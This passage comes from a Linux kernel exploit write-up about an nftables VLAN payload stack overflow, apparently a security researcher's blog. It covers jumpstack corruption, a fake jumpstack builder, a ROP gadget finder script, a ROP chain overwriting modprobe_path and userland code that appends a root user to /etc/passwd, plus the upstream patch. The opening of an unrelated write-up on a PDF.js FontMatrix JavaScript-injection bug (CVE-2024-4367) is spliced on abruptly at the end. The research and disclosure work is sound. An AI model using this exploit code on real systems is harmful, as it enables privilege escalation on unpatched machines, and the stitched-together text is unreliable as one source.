The red zones represent memory areas that have been corrupted with mostly unpredictable data, whereas the yellow ones are also partially controlled when pointing dst_u8 to the first register. The NFT registers are thus overwritten with data belonging to the nft_payload_eval stack frame, including the respective stack cookie and return address.

2.2 Elevating the tables

With a pretty solid infoleak at hand, it was time to move on to the memory corruption part.
While I was writing the initial vuln report, I tried switching the exploit register to the highest possible one (NFT_REG32_15) to see what would happen.

Surprisingly, I couldn’t reach the return address, indicating that a classic stack smashing scenario wasn’t an option. After a closer look, I noticed a substantially large structure, nft_jumpstack, which is 16*24 bytes long, absorbing the whole overflow.

2.2.1 Jumping between the stacks

The jumpstack structure I introduced in the previous section keeps track of the rules that have yet to be evaluated in the previous chains that have issued an NFT_JUMP verdict.

  • When the rule ruleA_1 in chainA desires to transfer the execution to another chain, chainB, it issues the NFT_JUMP verdict.
  • The next rule in chainA, ruleA_2, is stored in the jumpstack at the stackptr index, which keeps track of the depth of the call stack.
  • This is intended to restore the execution of ruleA_2 as soon as chainB has returned via the NFT_CONTINUE or NFT_RETURN verdicts.

This aspect of the nftables state machine isn’t that far from function stack frames, where the return address is pushed by the caller and then popped by the callee to resume execution from where it stopped.

While we can’t reach the return address, we can still hijack the program’s control flow by corrupting the next rule to be evaluated!

In order to corrupt as much regs-adjacent data as possible, the destination register should be changed to the last one, so that it’s clear how deep into the jumpstack the overflow goes.
After filling all registers with placeholder values and triggering the overflow, this was the result:

gef➤  p jumpstack
$334 = {{
    chain = 0x1017ba2583d7778c,         <== vlan_ethhdr data
    rule = 0x8ffff888004f11a,
    last_rule = 0x50ffff888004f118
  }, {
    chain = 0x40ffffc900000e09,
    rule = 0x60ffff888004f11a,
    last_rule = 0x50ffffc900000e0b
  }, {
    chain = 0xc2ffffc900000e0b,
    rule = 0x1ffffffff81d6cd,
    last_rule = 0xffffc9000f4000
  }, {
    chain = 0x50ffff88807dd21e,
    rule = 0x86ffff8880050e3e,
    last_rule = 0x8000000001000002      <== random data from the stack
  }, {
    chain = 0x40ffff88800478fb,
    rule = 0xffff888004f11a,
    last_rule = 0x8017ba2583d7778c
  }, {
    chain = 0xffff88807dd327,
    rule = 0xa9ffff888004764e,
    last_rule = 0x50000000ef7ad4a
  }, {
    chain = 0x0 ,
    rule = 0xff00000000000000,
    last_rule = 0x8000000000ffffff
  }, {
    chain = 0x41ffff88800478fb,
    rule = 0x4242424242424242,         <== regs are copied here: full control over rule and last_rule
    last_rule = 0x4343434343434343
  }, {
    chain = 0x4141414141414141,
    rule = 0x4141414141414141,
    last_rule = 0x4141414141414141
  }, {
    chain = 0x4141414141414141,
    rule = 0x4141414141414141,
    last_rule = 0x8c00008112414141

The copy operation is large enough to include the whole regs buffer in the source; this means that we can partially control the jumpstack!
The gef output shows how only the end of our 251-byte overflow is controllable and, if aligned correctly, it can overwrite the 8th and 9th rule and last_rule pointers.
To confirm that we are breaking something, we could just jump to 9 consecutive chains, and when evaluating the last one trigger the overflow and hopefully jump to jumpstack[8].rule:
As expected, we get a protection fault:

[ 1849.727034] general protection fault, probably for non-canonical address 0x4242424242424242: 0000 [#1] PREEMPT SMP NOPTI
[ 1849.727034] CPU: 1 PID: 0 Comm: swapper/1 Not tainted 6.2.0-rc1 #5
[ 1849.727034] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
[ 1849.727034] RIP: 0010:nft_do_chain+0xc1/0x740
[ 1849.727034] Code: 40 08 48 8b 38 4c 8d 60 08 4c 01 e7 48 89 bd c8 fd ff ff c7 85 00 fe ff ff ff ff ff ff 4c 3b a5 c8 fd ff ff 0f 83 4
[ 1849.727034] RSP: 0018:ffffc900000e08f0 EFLAGS: 00000297
[ 1849.727034] RAX: 4343434343434343 RBX: 0000000000000007 RCX: 0000000000000000
[ 1849.727034] RDX: 00000000ffffffff RSI: ffff888005153a38 RDI: ffffc900000e0960
[ 1849.727034] RBP: ffffc900000e0b50 R08: ffffc900000e0950 R09: 0000000000000009
[ 1849.727034] R10: 0000000000000017 R11: 0000000000000009 R12: 4242424242424242
[ 1849.727034] R13: ffffc900000e0950 R14: ffff888005153a40 R15: ffffc900000e0b60
[ 1849.727034] FS: 0000000000000000(0000) GS:ffff88807dd00000(0000) knlGS:0000000000000000
[ 1849.727034] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 1849.727034] CR2: 000055e3168e4078 CR3: 0000000003210000 CR4: 00000000000006e0

Let’s explore the nft_do_chain routine to understand what happened:

/* net/netfilter/nf_tables_core.c */

unsigned int nft_do_chain(struct nft_pktinfo *pkt, void *priv) {
	const struct nft_chain *chain = priv, *basechain = chain;
	const struct nft_rule_dp *rule, *last_rule;
	const struct net *net = nft_net(pkt);
	const struct nft_expr *expr, *last;
	struct nft_regs regs = {};
	unsigned int stackptr = 0;
	struct nft_jumpstack jumpstack[NFT_JUMP_STACK_SIZE];
	bool genbit = READ_ONCE(net->nft.gencursor);
	struct nft_rule_blob *blob;
	struct nft_traceinfo info;

	info.trace = false;
	if (static_branch_unlikely(&nft_trace_enabled))
		nft_trace_init(&info, pkt, &regs.verdict, basechain);
do_chain:
	if (genbit)
		blob = rcu_dereference(chain->blob_gen_1);       // Get correct chain generation
	else
		blob = rcu_dereference(chain->blob_gen_0);

	rule = (struct nft_rule_dp *)blob->data;          // Get first and last rules in chain
	last_rule = (void *)blob->data + blob->size;
next_rule:
	regs.verdict.code = NFT_CONTINUE;
	for (; rule < last_rule; rule = nft_rule_next(rule)) {   // 3. for each rule in chain
		nft_rule_dp_for_each_expr(expr, last, rule) {    // 4. for each expr in rule
			...
			expr_call_ops_eval(expr, &regs, pkt);    // 5. expr->ops->eval()

			if (regs.verdict.code != NFT_CONTINUE)
				break;
		}

		...
		break;
	}

	...
switch (regs.verdict.code) {
	case NFT_JUMP:
		/*
			1. If we're jumping to the next chain, store a pointer to the next rule of the 
      current chain in the jumpstack, increase the stack pointer and switch chain
		*/
		if (WARN_ON_ONCE(stackptr >= NFT_JUMP_STACK_SIZE))
			return NF_DROP;	
		jumpstack[stackptr].chain = chain;
		jumpstack[stackptr].rule = nft_rule_next(rule);
		jumpstack[stackptr].last_rule = last_rule;
		stackptr++;
		fallthrough;
	case NFT_GOTO:
		chain = regs.verdict.chain;
		goto do_chain;
	case NFT_CONTINUE:
	case NFT_RETURN:
		break;
	default:
		WARN_ON_ONCE(1);
	}
	/*
		2. If we got here then we completed the latest chain and can now evaluate
		the next rule in the previous one
	*/
	if (stackptr > 0) {
		stackptr--;
		chain = jumpstack[stackptr].chain;
		rule = jumpstack[stackptr].rule;
		last_rule = jumpstack[stackptr].last_rule;
		goto next_rule;
	}
		...

The first 8 jumps fall into case 1., where the NFT_JUMP verdict increases stackptr to align it with our controlled elements. Then, on the 9th jump, we overwrite the 8th element containing the next rule and return from the current chain, landing on the corrupted one. At 2. the stack pointer is decremented and control is returned to the previous chain.
Finally, the next rule in chain 8 gets dereferenced at 3: nft_rule_next(rule), too bad we just filled it with 0x42s, causing the protection fault.
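
For completeness, each of those jumps can be installed with an immediate expression that writes an NFT_JUMP verdict into the verdict register, roughly like this (a sketch built on the same libnftnl helpers as before, not the exact PoC code):

#include <libnftnl/expr.h>
#include <libnftnl/rule.h>
#include <linux/netfilter/nf_tables.h>

/* make the rule jump to target_chain: when it is evaluated, nft_do_chain
 * pushes the next rule of the current chain onto the jumpstack */
static void rule_add_jump(struct nftnl_rule *r, const char *target_chain)
{
    struct nftnl_expr *e = nftnl_expr_alloc("immediate");
    nftnl_expr_set_u32(e, NFTNL_EXPR_IMM_DREG, NFT_REG_VERDICT);
    nftnl_expr_set_u32(e, NFTNL_EXPR_IMM_VERDICT, NFT_JUMP);
    nftnl_expr_set_str(e, NFTNL_EXPR_IMM_CHAIN, target_chain);
    nftnl_rule_add_expr(r, e);
}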

2.2.2 Controlling the execution flow

Other than the rule itself, there are other pointers that should be taken care of to prevent the kernel from crashing, especially the ones dereferenced by nft_rule_dp_for_each_expr when looping through all rule expressions:

/* net/netfilter/nf_tables_core.c */

#define nft_rule_expr_first(rule)	(struct nft_expr *)&rule->data[0]
#define nft_rule_expr_next(expr)	((void *)expr) + expr->ops->size
#define nft_rule_expr_last(rule)	(struct nft_expr *)&rule->data[rule->dlen]
#define nft_rule_next(rule)		(void *)rule + sizeof(*rule) + rule->dlen

#define nft_rule_dp_for_each_expr(expr, last, rule) \
        for ((expr) = nft_rule_expr_first(rule), (last) = nft_rule_expr_last(rule); \
             (expr) != (last); \
             (expr) = nft_rule_expr_next(expr))
  1. nft_do_chain requires rule to be smaller than last_rule to enter the outer loop. This is not an issue as we control both fields in the 8th element. Furthermore, rule will point to another address in the jumpstack we control, so that it references valid memory.
  2. nft_rule_dp_for_each_expr thus calls nft_rule_expr_first(rule) to get the first expr from its data buffer, 8 bytes after rule. We can discard the result of nft_rule_expr_last(rule) since it won’t be dereferenced during the attack.
(remote) gef➤ p (int)&((struct nft_rule_dp *)0)->data
$29 = 0x8
(remote) gef➤ p *(struct nft_expr *) rule->data
$30 = {
  ops = 0xffffffff82328780,
  data = 0xffff888003788a38 "1374\377\377\377"
}
(remote) gef➤ x/10i 0xffffffff81a4fbdf
=> 0xffffffff81a4fbdf <nft_do_chain+143>:   cmp   r12,rbp
0xffffffff81a4fbe2 <nft_do_chain+146>:      jae   0xffffffff81a4feaf
0xffffffff81a4fbe8 <nft_do_chain+152>:      movzx eax,WORD PTR [r12]                  <== load rule into eax
0xffffffff81a4fbed <nft_do_chain+157>:      lea   rbx,[r12+0x8]                       <== load expr into rbx
0xffffffff81a4fbf2 <nft_do_chain+162>:      shr   ax,1
0xffffffff81a4fbf5 <nft_do_chain+165>:      and   eax,0xfff
0xffffffff81a4fbfa <nft_do_chain+170>:      lea   r13,[r12+rax*1+0x8]
0xffffffff81a4fbff <nft_do_chain+175>:      cmp   rbx,r13
0xffffffff81a4fc02 <nft_do_chain+178>:      jne   0xffffffff81a4fce5 <nft_do_chain+405>
0xffffffff81a4fc08 <nft_do_chain+184>:      jmp   0xffffffff81a4fed9 <nft_do_chain+905>

3. nft_do_chain calls expr->ops->eval(expr, regs, pkt); via expr_call_ops_eval(expr, &regs, pkt), so the dereference chain has to be valid and point to executable memory. Fortunately, all fields are at offset 0, so we can just place the expr, ops and eval pointers all next to each other to simplify the layout.

(remote) gef➤ x/4i 0xffffffff81a4fcdf
0xffffffff81a4fcdf <nft_do_chain+399>:      je    0xffffffff81a4feef <nft_do_chain+927>
0xffffffff81a4fce5 <nft_do_chain+405>:      mov   rax,QWORD PTR [rbx]                <== first QWORD at expr is expr->ops, store it into rax
0xffffffff81a4fce8 <nft_do_chain+408>:      cmp   rax,0xffffffff82328900 
=> 0xffffffff81a4fcee <nft_do_chain+414>:   jne   0xffffffff81a4fc0d <nft_do_chain+189>
(remote) gef➤ x/gx $rax
0xffffffff82328780 :    0xffffffff81a65410
(remote) gef➤ x/4i 0xffffffff81a65410
0xffffffff81a65410 <nft_immediate_eval>:    movzx eax,BYTE PTR [rdi+0x18]            <== first QWORD at expr->ops points to expr->ops->eval
0xffffffff81a65414 <nft_immediate_eval+4>:  movzx ecx,BYTE PTR [rdi+0x19]
0xffffffff81a65418 <nft_immediate_eval+8>:  mov   r8,rsi
0xffffffff81a6541b <nft_immediate_eval+11>: lea   rsi,[rdi+0x8]

In order to preserve as much space as possible, the layout for stack pivoting can be arranged inside the registers before the overflow. Since these values will be copied inside the jumpstack, we have enough time to perform the following steps:

  1. Set up a stack pivot payload in NFT_REG32_00 by repeatedly invoking nft_rule_immediate expressions as shown above (a minimal sketch of such an expression follows this list). Remember that we had leaked the regs address.
  2. Add the vulnerable nft_rule_payload expression that will later overflow the jumpstack with the previously added registers.
  3. Refill the registers with a ROP chain to elevate privileges with nft_rule_immediate.
  4. Trigger the overflow: code execution will start from the jumpstack and then pivot to the ROP chain starting from NFT_REG32_00.
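
A minimal sketch of the register-filling primitive used in steps 1 and 3 (the helper style follows the earlier snippets; this is not the exact PoC code):

#include <stdint.h>
#include <libnftnl/expr.h>
#include <libnftnl/rule.h>
#include <linux/netfilter/nf_tables.h>

/* write a 4-byte immediate into one of the 32-bit NFT registers;
 * chaining 16 of these fills the whole 64-byte regs area */
static void rule_add_immediate_u32(struct nftnl_rule *r, uint32_t dreg,
                                   uint32_t value)
{
    struct nftnl_expr *e = nftnl_expr_alloc("immediate");
    nftnl_expr_set_u32(e, NFTNL_EXPR_IMM_DREG, dreg);
    nftnl_expr_set(e, NFTNL_EXPR_IMM_DATA, &value, sizeof(value));
    nftnl_rule_add_expr(r, e);
}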

By following these steps we managed to store the eval pointer and the stack pivot routine on the jumpstack, which would’ve otherwise filled up the regs too quickly.
In fact, without this optimization, the required space would be:
8 (rule) + 8 (expr) + 8 (eval) + 64 (ROP chain) = 88 bytes
Unfortunately, the regs buffer can only hold 64 bytes.

By applying the described technique we can reduce it to:

  • jumpstack: 8 (rule) + 8 (expr) + 8 (eval) = 24 bytes
  • regs: 64 bytes (ROP chain) which will fit perfectly in the available space.

Here is how I crafted the fake jumpstack to achieve initial code execution:

struct jumpstack_t fill_jumpstack(unsigned long regs, unsigned long kaslr) 
{
    struct jumpstack_t jumpstack = {0};
    /*
        align payload to rule
    */
    jumpstack.init = 'A';
    /*
        rule->expr will skip 8 bytes, here we basically point rule to itself + 8
    */
    jumpstack.rule =  regs + 0xf0;
    jumpstack.last_rule = 0xffffffffffffffff;
    /*
        point expr to itself + 8 so that eval() will be the next pointer
    */
    jumpstack.expr = regs + 0x100;
    /*
        we're inside nft_do_chain and regs is declared in the same function,
        finding the offset should be trivial: 
        stack_pivot = &NFT_REG32_00 - RSP
        the pivot will add 0x48 to RSP and pop 3 more registers, totaling 0x60
    */
    jumpstack.pivot = 0xffffffff810280ae + kaslr;
    unsigned char pad[32] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"; /* 31 'A's plus the NUL terminator needed by strcpy() */
    strcpy(jumpstack.pad, pad);
    return jumpstack;
}

2.2.3 Getting UID 0

The next steps consist in finding the right gadgets to build up the ROP chain and make the exploit as stable as possible.

There exist several tools to scan for ROP gadgets, but I found that most of them couldn’t deal with large images too well. Furthermore, for some reason, only ROPgadget manages to find all the stack pivots in function epilogues, even if it prints them as static offsets. Out of laziness, I scripted my own gadget finder based on objdump, which is useful for short relative pivots (rsp + small offset):

#!/bin/bash

objdump -j .text -M intel -d linux-6.1.6/vmlinux > obj.dump
grep -n '48 83 c4 30' obj.dump | while IFS=":" read -r line_num line; do
        ret_line_num=$((line_num + 7))
        if [[ $(awk "NR==$ret_line_num" obj.dump | grep ret) =~ ret ]]; then
                out=$(awk "NR>=$line_num && NR<=$ret_line_num" obj.dump)
                if [[ ! $out == *"mov"* ]]; then
                        echo "$out"
                        echo -e "\n-----------------------------"
                fi
        fi
done

In this example case we’re looking to increase rsp by 0x60, and our script will find all stack cleanup routines incrementing it by 0x30 and then popping 6 more registers to reach the desired offset:

ffffffff8104ba47:    48 83 c4 30       add rsp, 0x30
ffffffff8104ba4b:    5b                pop rbx
ffffffff8104ba4c:    5d                pop rbp
ffffffff8104ba4d:    41 5c             pop r12
ffffffff8104ba4f:    41 5d             pop r13
ffffffff8104ba51:    41 5e             pop r14
ffffffff8104ba53:    41 5f             pop r15
ffffffff8104ba55:    e9 a6 78 fb 00    jmp ffffffff82003300 <__x86_return_thunk>

Even though it seems to be calling a jmp, gdb can confirm that we’re indeed returning to the saved rip via ret:

(remote) gef➤ x/10i 0xffffffff8104ba47
0xffffffff8104ba47 <set_cpu_sibling_map+1255>:    add   rsp,0x30
0xffffffff8104ba4b <set_cpu_sibling_map+1259>:    pop   rbx
0xffffffff8104ba4c <set_cpu_sibling_map+1260>:    pop   rbp
0xffffffff8104ba4d <set_cpu_sibling_map+1261>:    pop   r12
0xffffffff8104ba4f <set_cpu_sibling_map+1263>:    pop   r13
0xffffffff8104ba51 <set_cpu_sibling_map+1265>:    pop   r14
0xffffffff8104ba53 <set_cpu_sibling_map+1267>:    pop   r15
0xffffffff8104ba55 <set_cpu_sibling_map+1269>:    ret

Of course, the script can be adjusted to look for different gadgets.

Now, as for the privesc itself, I went for the most convenient and simplest approach: overwriting the modprobe_path variable to run a userland binary as root. Since this technique is widely known, I’ll just refer to the existing in-depth analyses of it.
We’re assuming that STATIC_USERMODEHELPER is disabled.

In short, the payload does the following (a sketch of the resulting 64-byte layout follows the list):

  1. pop rax; ret : Set rax = /tmp/runme where runme is the executable that modprobe will run as root when trying to find the right module for the specified binary header.
  2. pop rdi; ret: Set rdi = &modprobe_path, this is just the memory location for the modprobe_path global variable.
  3. mov qword ptr [rdi], rax; ret: Perform the copy operation.
  4. mov rsp, rbp; pop rbp; ret: Return to userland.
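
Putting the four gadgets together, the 64-byte regs area can be laid out roughly as follows. This is a sketch, not the author’s exact chain: the gadget addresses are placeholders that must be located in the target kernel and rebased with the leaked KASLR slide, and the illustrative path /tmp/x is chosen because it fits in a single qword (the /tmp/runme path mentioned above would need a second write):

#include <stdint.h>

/* gadget/symbol addresses: to be resolved from the target kernel image and
 * rebased with the leaked KASLR slide (see the infoleak section) */
extern uint64_t pop_rax_ret, pop_rdi_ret, mov_qword_rdi_rax_ret,
                mov_rsp_rbp_pop_rbp_ret, modprobe_path_addr;

/* exactly 64 bytes: what fits into NFT_REG32_00..NFT_REG32_15 */
static uint64_t rop[8];

static void build_rop(void)
{
    rop[0] = pop_rax_ret;               /* 1. rax = new modprobe path          */
    rop[1] = 0x0000782f706d742fULL;     /*    "/tmp/x\0" packed little-endian  */
    rop[2] = pop_rdi_ret;               /* 2. rdi = &modprobe_path             */
    rop[3] = modprobe_path_addr;
    rop[4] = mov_qword_rdi_rax_ret;     /* 3. *modprobe_path = "/tmp/x"        */
    rop[5] = mov_rsp_rbp_pop_rbp_ret;   /* 4. unwind back towards nf_hook_slow */
    rop[6] = rop[7] = 0x4141414141414141ULL;  /* padding                       */
}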

While the first three gadgets are pretty straightforward and common to find, the last one requires some caution. Normally a kernel exploit would switch context by calling the so-called KPTI trampoline swapgs_restore_regs_and_return_to_usermode, a special routine that swaps the page tables and the required registers back to the userland ones by executing the swapgs and iretq instructions.
In our case, since the ROP chain is running in the softirq context, I’m not sure if using the same method would have worked reliably; it’s probably just better to first return to the syscall context and then run our code from userland.

Here is the stack frame from the ROP chain execution context:

gef➤ bt
#0 nft_payload_eval (expr=0xffff888805e769f0, regs=0xffffc90000083950, pkt=0xffffc90000883689) at net/netfilter/nft_payload.c:124
#1 0xffffffff81c2cfa1 in expr_call_ops_eval (pkt=0xffffc90000083b80, regs=0xffffc90000083950, expr=0xffff888005e769f0)
#2 nft_do_chain (pkt=pkt@entry=0xffffc90000083b80, priv=priv@entry=0xffff888005f42a50) at net/netfilter/nf_tables_core.c:264
#3 0xffffffff81c43b14 in nft_do_chain_netdev (priv=0xffff888805f42a50, skb=, state=)
#4 0xffffffff81c27df8 in nf_hook_entry_hookfn (state=0xffffc90000083c50, skb=0xffff888005f4a200, entry=0xffff88880591cd88)
#5 nf_hook_slow (skb=skb@entry=0xffff888005f4a200, state=state@entry=0xffffc90000083c50, e=e@entry=0xffff88800591cd00, s=s@entry=0...
#6 0xffffffff81b7abf7 in nf_hook_ingress (skb=) at ./include/linux/netfilter_netdev.h:34
#7 nf_ingress (orig_dev=0xffff888005ff0000, ret=, pt_prev=, skb=) at net/core,
#8 ___netif_receive_skb_core (pskb=pskb@entry=0xffffc90000083cd0, pfmemalloc=pfmemalloc@entry=0x0, ppt_prev=ppt_prev@entry=0xffffc9...
#9 0xffffffff81b7b0ef in _netif_receive_skb_one_core (skb=, pfmemalloc=pfmemalloc@entry=0x0) at net/core/dev.c:548
#10 0xffffffff81b7b1a5 in ___netif_receive_skb (skb=) at net/core/dev.c:5603
#11 0xffffffff81b7b40a in process_backlog (napi=0xffff888007a335d0, quota=0x40) at net/core/dev.c:5931
#12 0xffffffff81b7c013 in ___napi_poll (n=n@entry=0xffff888007a335d0, repoll=repoll@entry=0xffffc90000083daf) at net/core/dev.c:6498
#13 0xffffffff81b7c493 in napi_poll (repoll=0xffffc90000083dc0, n=0xffff888007a335d0) at net/core/dev.c:6565
#14 net_rx_action (h=) at net/core/dev.c:6676
#15 0xffffffff82280135 in ___do_softirq () at kernel/softirq.c:574

Any function between the last corrupted one and __do_softirq would work to exit gracefully. To simulate the end of the current chain evaluation we can just return to nf_hook_slow since we know the location of its rbp.

Yes, we should also disable maskable interrupts via a cli; ret gadget, but we wouldn’t have enough space, and besides, we will be discarding the network interface right after.

To prevent any deadlocks and random crashes caused by skipping over the nft_do_chain function, a NFT_MSG_DELTABLE message is immediately sent to flush all nftables structures and we quickly exit the program to disable the network interface connected to the new network namespace.
Therefore, gadget 4 just pops nft_do_chain’s rbp and runs a clean leave; ret, this way we don’t have to worry about forcefully switching context.
As soon as execution is handed back to userland, a file with an unknown header is executed to trigger the executable under modprobe_path that will add a new user with UID 0 to /etc/passwd.
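
The userland side of the classic modprobe_path trigger then looks roughly like this (an illustrative sketch consistent with the steps above; the file names are placeholders and must match the path written by the ROP chain):

#include <stdlib.h>

int main(void)
{
    /* helper that the kernel will execute as root via the modprobe path */
    system("printf '#!/bin/sh\\necho pwned::0:0:root:/root:/bin/sh >> /etc/passwd\\n' > /tmp/x");
    system("chmod +x /tmp/x");

    /* executing a file with an unknown magic makes the kernel invoke the
     * binary pointed to by modprobe_path, which we have just hijacked */
    system("printf '\\377\\377\\377\\377' > /tmp/trigger");
    system("chmod +x /tmp/trigger; /tmp/trigger");
    return 0;
}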

While this is in no way a data-only exploit, notice how the entire exploit chain lives inside kernel memory; this is crucial to bypass mitigations:

  • KPTI requires page tables to be swapped to the userland ones while switching context, __do_softirq will take care of that.
  • SMEP/SMAP prevent us from reading, writing and executing code from userland while in kernel mode. Writing the whole ROP chain in kernel memory that we control allows us to fully bypass those measures as well.

2.3. Patching the tables

Patching this vulnerability is trivial, and the most straightforward change has been approved by Linux developers:

@@ -63,7 +63,7 @@ nft_payload_copy_vlan(u32 *d, const struct sk_buff *skb, u8 offset, u8 len)
			return false;

		if (offset + len > VLAN_ETH_HLEN + vlan_hlen)
-			ethlen -= offset + len - VLAN_ETH_HLEN + vlan_hlen;
+			ethlen -= offset + len - VLAN_ETH_HLEN - vlan_hlen;

		memcpy(dst_u8, vlanh + offset - vlan_hlen, ethlen);

While this fix is valid, I believe that simplifying the whole expression would have been better:

@@ -63,7 +63,7 @@ nft_payload_copy_vlan(u32 *d, const struct sk_buff *skb, u8 offset, u8 len)
			return false;

		if (offset + len > VLAN_ETH_HLEN + vlan_hlen)
-			ethlen -= offset + len - VLAN_ETH_HLEN + vlan_hlen;
+			ethlen = VLAN_ETH_HLEN + vlan_hlen - offset;

		memcpy(dst_u8, vlanh + offset - vlan_hlen, ethlen);

since ethlen is initialized with len and isn’t modified anywhere else before this point.

The vulnerability existed since Linux v5.5-rc1 and has been patched with commit 696e1a48b1a1b01edad542a1ef293665864a4dd0 in Linux v6.2-rc5.

One possible approach to making this vulnerability class harder to exploit involves using the same randomization logic as the one in the kernel stack (aka per-syscall kernel-stack offset randomization): by randomizing the whole kernel stack on each syscall entry, any KASLR leak is only valid for a single attempt. This security measure isn’t applied when entering the softirq context as a new stack is allocated for those operations at a static address.

You can find the PoC with its kernel config on my Github profile. The exploit has purposefully been built with only a specific kernel version in mind, so as to make it harder to use for illicit purposes. Adapting it to another kernel would require the following steps:

  • Reshaping the kernel leak from the nft registers,
  • Finding the offsets of the new symbols,
  • Calculating the stack pivot length
  • etc.

In the end this was just a side project, but I’m glad I was able to push through the initial discomforts as the final result is something I am really proud of. I highly suggest anyone interested in kernel security and CTFs to spend some time auditing the Linux kernel to make our OSs more secure and also to have some fun!
I’m writing this article one year after the 0-day discovery, so I expect there to be some inconsistencies or mistakes, please let me know if you spot any.

I want to thank everyone who allowed me to delve into this research with no clear objective in mind, especially my team @ Betrusted and the HackInTheBox crew for inviting me to present my experience in front of so many great people! If you’re interested, you can watch my presentation here:

CVE-2024-4367 – Arbitrary JavaScript execution in PDF.js

CVE-2024-4367 – Arbitrary JavaScript execution in PDF.js

research by Thomas Rinsma


TL;DR 

This post details CVE-2024-4367, a vulnerability in PDF.js found by Codean Labs. PDF.js is a JavaScript-based PDF viewer maintained by Mozilla. This bug allows an attacker to execute arbitrary JavaScript code as soon as a malicious PDF file is opened. This affects all Firefox users (<126) because PDF.js is used by Firefox to show PDF files, but also seriously impacts many web- and Electron-based applications that (indirectly) use PDF.js for preview functionality.

If you are a developer of a JavaScript/Typescript-based application that handles PDF files in any way, we recommend checking that you are not (indirectly) using a vulnerable version of PDF.js. See the end of this post for mitigation details.

Introduction 

There are two common use-cases for PDF.js. First, it is Firefox’s built-in PDF viewer. If you use Firefox and you’ve ever downloaded or browsed to a PDF file you’ll have seen it in action. Second, it is bundled into a Node module called 

pdfjs-dist
, with ~2.7 million weekly downloads according to NPM. In this form, websites can use it to provide embedded PDF preview functionality. This is used by everything from Git-hosting platforms to note-taking applications. The one you’re thinking of now is likely using PDF.js.

The PDF format is famously complex. With support for various media types, complicated font rendering and even rudimentary scripting, PDF readers are a common target for vulnerability researchers. With such a large amount of parsing logic, there are bound to be some mistakes, and PDF.js is no exception to this. What makes it unique however is that it is written in JavaScript as opposed to C or C++. This means that there is no opportunity for memory corruption problems, but as we will see it comes with its own set of risks.

Glyph rendering 

You might be surprised to hear that this bug is not related to the PDF format’s (JavaScript!) scripting functionality. Instead, it is an oversight in a specific part of the font rendering code.

Fonts in PDFs can come in several different formats, some of them more obscure than others (at least for us). For modern formats like TrueType, PDF.js defers mostly to the browser’s own font renderer. In other cases, it has to manually turn glyph (i.e., character) descriptions into curves on the page. To optimize this for performance, a path generator function is pre-compiled for every glyph. If supported, this is done by making a JavaScript 

Function
 object with a body (
jsBuf
) containing the instructions that make up the path:

// If we can, compile cmds into JS for MAXIMUM SPEED...
if (this.isEvalSupported && FeatureTest.isEvalSupported) {
  const jsBuf = [];
  for (const current of cmds) {
    const args = current.args !== undefined ? current.args.join(",") : "";
    jsBuf.push("c.", current.cmd, "(", args, ");\n");
  }
  // eslint-disable-next-line no-new-func
  console.log(jsBuf.join(""));
  return (this.compiledGlyphs[character] = new Function(
    "c",
    "size",
    jsBuf.join("")
  ));
}

From an attacker perspective this is really interesting: if we can somehow control these 

cmds
 going into the 
Function
 body and insert our own code, it would be executed as soon as such a glyph is rendered.

Well, let’s look at how this list of commands is generated. Following the logic back to the 

CompiledFont
 class we find the method 
compileGlyph(...)
. This method initializes the 
cmds
 array with a few general commands (
save
transform
scale
 and 
restore
), and defers to a 
compileGlyphImpl(...)
 method to fill in the actual font-specific commands:

compileGlyph(code, glyphId) {
    if (!code || code.length === 0 || code[0] === 14) {
      return NOOP;
    }

    let fontMatrix = this.fontMatrix;
    ...

    const cmds = [
      { cmd: "save" },
      { cmd: "transform", args: fontMatrix.slice() },
      { cmd: "scale", args: ["size", "-size"] },
    ];
    this.compileGlyphImpl(code, cmds, glyphId);

    cmds.push({ cmd: "restore" });

    return cmds;
  }

If we instrument the PDF.js code to log generated 

Function
 objects, we see that the generated code indeed contains those commands:

c.save();
c.transform(0.001,0,0,0.001,0,0);
c.scale(size,-size);
c.moveTo(0,0);
c.restore();

At this point we could audit the font parsing code and the various commands and arguments that can be produced by glyphs, like 

quadraticCurveTo
 and 
bezierCurveTo
, but all of this seems pretty innocent with no ability to control anything other than numbers. What turns out to be much more interesting however is the 
transform
 command we saw above:

{ cmd: "transform", args: fontMatrix.slice() },

This 

fontMatrix
 array is copied (with 
.slice()
) and inserted into the body of the 
Function
 object, joined by commas. The code clearly assumes that it is a numeric array, but is that always the case? Any string inside this array would be inserted literally, without any quotes surrounding it. Hence, that would break the JavaScript syntax at best, and give arbitrary code execution at worst. But can we even control the contents of 
fontMatrix
 to that degree?

Enter the FontMatrix 

The value of 

fontMatrix
 defaults to 
[0.001, 0, 0, 0.001, 0, 0]
, but is often set to a custom matrix by a font itself, i.e., in its own embedded metadata. How this is done exactly differs per font format. Here’s the Type1 parser, for example:

extractFontHeader(properties) {
    let token;
    while ((token = this.getToken()) !== null) {
      if (token !== "/") {
        continue;
      }
      token = this.getToken();
      switch (token) {
        case "FontMatrix":
          const matrix = this.readNumberArray();
          properties.fontMatrix = matrix;
          break;
        ...
      }
      ...
    }
    ...
  }

This is not very interesting for us. Even though Type1 fonts technically contain arbitrary Postscript code in their header, no sane PDF reader supports this fully and most just try to read predefined key-value pairs with expected types. In this case, PDF.js just reads a number array when it encounters a 

FontMatrix
 key. It appears that the 
CFF
 parser — used for several other font formats — is similar in this regard. All in all, it looks like we are indeed limited to numbers.

However, it turns out that there is more than one potential origin of this matrix. Apparently, it is also possible to specify a custom 

FontMatrix
 value outside of a font, namely in a metadata object in the PDF! Looking carefully at the 
PartialEvaluator.translateFont(...)
 method, we see that it loads various attributes from PDF dictionaries associated with the font, one of them being the 
fontMatrix
:

const properties = {
      type,
      name: fontName.name,
      subtype,
      file: fontFile,
      ...
      fontMatrix: dict.getArray("FontMatrix") || FONT_IDENTITY_MATRIX,
      ...
      bbox: descriptor.getArray("FontBBox") || dict.getArray("FontBBox"),
      ascent: descriptor.get("Ascent"),
      descent: descriptor.get("Descent"),
      xHeight: descriptor.get("XHeight") || 0,
      capHeight: descriptor.get("CapHeight") || 0,
      flags: descriptor.get("Flags"),
      italicAngle: descriptor.get("ItalicAngle") || 0,
      ...
    };

In the PDF format, font definitions consist of several objects. The 

Font
, its 
FontDescriptor
 and the actual 
FontFile
. For example, here represented by objects 1, 2 and 3:

1 0 obj
<<
  /Type /Font
  /Subtype /Type1
  /FontDescriptor 2 0 R
  /BaseFont /FooBarFont
>>
endobj

2 0 obj
<<
  /Type /FontDescriptor
